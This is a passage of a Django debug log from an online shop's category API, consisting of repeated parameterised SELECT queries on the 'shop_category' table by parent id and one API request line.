07:30:59,210 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:30:59,215 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:30:59,219 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:30:59,225 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:30:59,229 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:30:59,233 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:30:59,237 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:30:59,241 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:30:59,247 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:30:59,251 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:30:59,255 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:30:59,258 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:30:59,260 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:30:59,264 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:30:59,266 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:30:59,268 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:30:59,270 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:30:59,273 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:30:59,275 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:30:59,278 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:30:59,280 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:30:59,283 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:30:59,285 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:30:59,287 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:30:59,291 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:30:59,293 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:30:59,295 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:30:59,297 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:30:59,300 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:30:59,303 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:30:59,306 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:30:59,308 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:30:59,310 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:30:59,312 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:30:59,315 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:30:59,317 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:30:59,320 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:30:59,322 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:30:59,325 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:30:59,327 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:30:59] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:30:59,946 utils 31843 140533074753280 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:30:59,953 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:30:59,956 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:30:59,959 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:30:59,963 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:30:59,965 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:30:59,967 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:30:59,970 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:30:59,972 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:30:59,976 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:30:59,978 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:30:59,980 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:30:59,983 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:30:59,985 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:30:59,988 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:30:59,990 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:30:59,993 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:30:59,995 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:30:59,997 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:31:00,001 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:31:00,004 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:31:00,007 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:31:00,009 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:31:00,012 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:31:00,014 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:31:00,017 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:31:00,020 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:31:00,022 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 